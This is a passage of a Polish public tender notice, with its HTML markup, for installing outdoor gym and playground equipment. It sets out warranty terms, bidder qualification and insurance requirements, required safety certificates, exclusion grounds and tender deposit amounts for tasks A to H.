niniejszej SIWZ. 6.	Równoważność rozwiązań zostanie oceniona na etapie badania złożonych ofert, przy czym Zamawiający wymaga od Wykonawcy złożenia wraz z ofertą zestawienia materiałów zamiennych w stosunku do dokumentacji technicznej (t.j. opracowanie zawierające co najmniej: katalog producenta, nazwę producenta, opis materiałów i dokumenty zawierające szczegółowe dane techniczne oraz parametry określające urządzenia i materiały).VI. Gwarancja jakości i rękojmia za wady:1.Wykonawca udzieli gwarancji jakości na wykonane roboty budowlane oraz urządzenia licząc od daty podpisania przez obie strony protokołu odbioru wykonania przedmiotu zamówienia na okres nie krótszy niż 36 miesięcy. W okresie tym Wykonawca zobowiązuje się usunąć wynikłe wady nieodpłatnie w terminie do pięciu dni od daty zgłoszenia ich przez Zamawiającego. 2. Okres gwarancyjny nie zostanie uznany za zakończony, dopóki nie zostaną usunięte przez Wykonawcę wady i usterki zgłoszone do czasu upływu terminu gwarancyjnego oraz nie wygaśnie bieg gwarancji zgodnie z art. 851 § 1KC a potwierdzeniem zakończenia będzie podpisany przez obie strony protokół odbioru pogwarancyjnego. Na zabudowane urządzenia posiadające gwarancję producenta Wykonawca udzieli gwarancji na okres zgodny z kartą producenta. 3. Na wykonane roboty budowlane oraz urządzenia Wykonawca udziela rękojmi na okres równy okresowi gwarancji.VII. Obowiązek zatrudnienia na umowę o pracę:Zamawiający wymaga, aby wszystkie czynności w pełnym zakresie rzeczowym wyszczególnionym w dokumentacji wykonywane były przez osoby zatrudnione przez Wykonawcę i Podwykonawcę/ów na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r.- Kodeks pracy (Dz.U. z 2018 r., poz. 917 z późn. zm.). Powyższy wymóg nie dotyczy Kierownika Budowy.VIII. Wymagania w zakresie dostępności dla osób niepełnosprawnych: Mając na względzie fakt, iż roboty budowlane w zakresie opisanego przedmiotu zamówienia w pkt. 3.3. SIWZ nie wymagają konieczności dostosowania ich wykonania dla osób niepełnosprawnych (brak szczegółowych przepisów prawa regulujących te kwestie) nie wprowadza się regulacji w zakresie art. 29 ust 5 ustawy Pzp.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45000000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45100000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112700-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112720-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112720-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45112000-5</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">60</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Uszczegółowienie sekcji II.8): Termin wykonania zamówieniapublicznego: 1. Termin rozpoczęcia wykonania przedmiotu umowy: od daty podpisania umowy. 2.Termin zakończenia wykonania przedmiotu umowy: wg oferty - od 50 do 60 dni kalendarzowych oddaty podpisania umowy. Uwaga: 1. Termin realizacji zamówienia stanowi kryterium oceny ofertzgodnie z pkt. 24.2.2. SIWZ. 2. Termin realizacji zamówienia należy określić w dniachkalendarzowych. 3. Brak deklaracji terminu w Formularzu ofertowym bądź jego określenie ponadtermin maksymalny skutkować będzie odrzuceniem oferty w trybie art. 89 ust. 1 pkt 2 ustawy Pzp. Wprzypadku, gdy Wykonawca zadeklaruje termin realizacji zadania krótszy niż minimalny, dla potrzebporównania i oceny ofert, zostanie przyjęty termin 50 dni od dnia podpisania umowy, natomiastzadeklarowany termin zostanie wpisany do umowy.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Za minimalny poziom zdolności uznane zostanie, wykazanie przezWykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonejdziałalności związanej z przedmiotem zamówienia na sumę gwarancyjną: DLA ZADANIAA,B,E,G,H: - nie mniejszą niż 80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych 00/100) lub dlawalut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotego wstosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którymzamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.DLA ZADANIA C, F: - nie mniejszą niż 70 000,00 zł (słownie: siedemdziesiąt tysięcy złotych00/100) lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursuzłotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którymzamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień PublicznychDLA ZADANIA D: - nie mniejszą niż 30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100)lub dla walut obcych na kwotę w wysokości równoważnej liczonej według średniego kursu złotegow stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którymzamieszczone zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Za minimalny poziom zdolności uznane zostanie, wykazanie przezWykonawcę, że: 1. nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał wsposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył: DLAZADANIA A, B, F, G, H: - 1 robotę budowlaną o wartości min. 50.000,00 zł brutto obejmującąswoim zakresem prace polegające na zabudowie lub montażu urządzeń siłowych. DLA ZADANIAC, D, E, F, G: - 1 robotę budowlaną o wartości min. 30.000,00 zł brutto obejmującą swoimzakresem prace polegające na zabudowie lub montażu urządzeń zabawowych. Uwagi: 1.Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona wedługśredniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego wdniu, w którym ogłoszenie o niniejszym postępowaniu zostało zamieszczone w BiuletynieZamówień Publicznych. 2. W przypadku, gdy Wykonawca polega na zasobach innych podmiotówprzy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tychpodmiotów w wykonaniu zamówienia. 3. Wykonawca, który w celu potwierdzenia warunku, októrym mowa w pkt. 8.2.3.1. SIWZ, będzie się legitymował wiedzą i doświadczeniem nabytym wramach wspólnej realizacji umów z innymi wykonawcami (konsorcjum) zobowiązany jest wykazaćzakres robót, w wykonaniu którego faktycznie uczestniczył. 2. skieruje do realizacji zamówieniapublicznego osoby, w szczególności odpowiedzialne za kierowanie robotami budowlanymi tj.: 1.minimum 1 osobę wyznaczoną do pełnienia funkcji Kierownika budowy posiadającą uprawnieniabudowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej zgodnie z ustawąPrawo Budowlane (Dz. U. z 2018 r., poz. 1202 z późn. zm.) lub odpowiadające im ważneuprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lubodpowiednich przepisów obowiązujących na terenie kraju, z którego pochodzi dana osoba, które wzakresie objętym zamówieniem będą pozwalać na pełnienie samodzielnych funkcji technicznych wbudownictwie w ww. specjalności. W przypadku złożenia oferty na więcej niż jedno zadanie,Zamawiający dopuszcza, aby był jeden Kierownik budowy na wszystkie zadania.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia przez wykonawcę, którego oferta została najwyżej oceniona braku podstawwykluczenia, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w terminie 5dni, następujących oświadczeń i dokumentów aktualnych na dzień ich złożenia: 1. zaświadczeniawłaściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega zopłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminuskładania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie zwłaściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkamilub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lubrozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwegoorganu; 2. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lubzdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lubinnego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organemw sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatnościlub wstrzymanie w całości wykonania decyzji właściwego organu; 3. odpisu z właściwego rejestrulub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisywymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia napodstawie art. 24 ust. 5 pkt 1 ustawy Pzp.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełniania przez Wykonawcę, którego oferta została najwyżej oceniona,warunków udziału w postępowaniu, zgodnie z art. 26 ust. 2 ustawy Pzp Zamawiający wezwie dozłożenia w terminie 5 dni, następujących oświadczeń i dokumentów aktualnych na dzień ichzłożenia: 1. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 latprzed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - wtym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, narzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te robotybudowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostaływykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czymdowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, narzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny oobiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - innedokumenty- wzór wykazu stanowi załącznik nr 5 do SIWZ. 2. wykazu osób, skierowanych przezwykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych zaświadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjamina temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dowykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności orazinformacją o podstawie do dysponowania tymi osobami - wzór wykazu stanowi załącznik nr 6 doSIWZ. 3. dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialnościcywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumęgwarancyjną określoną przez Zamawiającego w pkt. 8.2.2. SIWZ.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia przez wykonawcę, którego oferta została najwyżej oceniona, że oferowaneroboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, zgodnie z art. 26ust. 2 ustawy Pzp Zamawiający wezwie do złożenia w terminie 5 dni, następujących oświadczeń idokumentów aktualnych na dzień ich złożenia: 1 ważne certyfikaty zgodności z normą PN - EN1176 wszystkich urządzeń zabawowych przewidzianych do montażu wydane przez niezależnąjednostkę certyfikującą lub dokumenty równoważne w kraju zrzeszonym w Unii Europejskiej, a wprzypadku państw spoza Unii Europejskiej dokument/y równoważne (ZADANIE C, D, E, F, G), 2.ważny certyfikat zgodności z normą PN - EN 1177 wszystkich użytych nawierzchni bezpiecznychz mat przerostowych wydany przez niezależną jednostkę certyfikującą lub dokument równoważnyw kraju zrzeszonym w Unii Europejskiej, a w przypadku państw spoza Unii Europejskiejdokument/y równoważne (ZADANIE C, E, G), 3. ważne certyfikaty zgodności z normą PN - EN16630 wszystkich urządzeń do siłowni zewnętrznych przewidzianych do montażu wydane przezniezależną jednostkę certyfikującą lub dokument równoważny w kraju zrzeszonym w UniiEuropejskiej, a w przypadku państw spoza Unii Europejskiej dokument/y równoważne (ZADANIEA, B, F, G, H), 4. atest higieniczny PZH lub dokument równoważny dla wszystkich użytychnawierzchni bezpiecznych z mat przerostowych (ZADANIE C, E, G), 5. atest PZH lub dokumentrównoważny dla dostarczanego piasku (ZADANIE E,F). Uwaga: Wykonawca, który z przyczynniezależnych od niego, nie ma możliwości uzyskania dokumentów, o których mowa w pkt. 9.6.SIWZ, może złożyć inne dokumenty dotyczące odpowiednio zapewnienia jakości lub środkówzarządzania środowiskowego, potwierdzające stosowanie przez wykonawcę środków zapewnieniajakości zgodnych z wymaganymi normami zapewniania jakości lub środków zarządzaniaśrodowiskowego równoważnych środkom wymaganym na mocy mającego zastosowanie systemulub norm zarządzania środowiskowego.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Ponadto do oferty należy załączyć: 1. Formularz ofertowy - załącznik nr 1do SIWZ (wskazana datapodpisania). 2.Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądźdo reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formieoryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej); 3.Dokument(-y), np. zobowiązanie podmiotów, na zasobach których Wykonawca będzie polegał wtrybie art. 22a ustawy Pzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzebyrealizacji zamówienia, treści których musi wynikać w szczególności: - zakres dostępnychWykonawcy zasobów innego podmiotu, - sposób wykorzystania zasobów innego podmiotu, przezWykonawcę, przy wykonywaniu zamówienia publicznego, - zakres i okres udziału innegopodmiotu przy wykonywaniu zamówienia publicznego, - czy podmiot, na zdolnościach któregoWykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczącychwykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, którychwskazane zdolności dotyczą. 4. Potwierdzenie wniesienia wadium. 5.Zestawienie materiałówzamiennych w stosunku do dokumentacji technicznej (o ile Wykonawca zastosuje materiałyrównoważne). 6. W terminie 3 dni od zamieszczenia na stronie internetowej informacji, o którejmowa w art. 86 ust. 5 ustawy Pzp, oświadczenia wykonawcy o przynależności albo brakuprzynależności do tej samej grupy kapitałowej o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzpzgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ. Wraz ze złożeniem oświadczenia,Wykonawca może złożyć dokumenty bądź informacje potwierdzające, że powiązania z innymwykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości: Zadanie A- 3.000 zł (trzy tysiące złotych), Zadanie B - 2.600 zł (dwa tysiące sześćset złotych), Zadanie C -2.300 zł (dwa tysiące trzysta złotych), Zadanie D - 1.000 zł (jeden tysiąc złotych), Zadanie E -2.900 zł (dwa tysiące dziewięćset złotych), Zadanie F - 2.100 zł (dwa tysiące sto złotych), ZadanieG - 2.600 zł (dwa tysiące sześćset złotych), Zadanie H - 3.200 zł (trzy tysiące dwieście złotych), wformach określonych w art. 45 ust. 6 ustawy Pzp i musi być wykonalne na terytorium Rzeczypospolitej Polskiej.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) 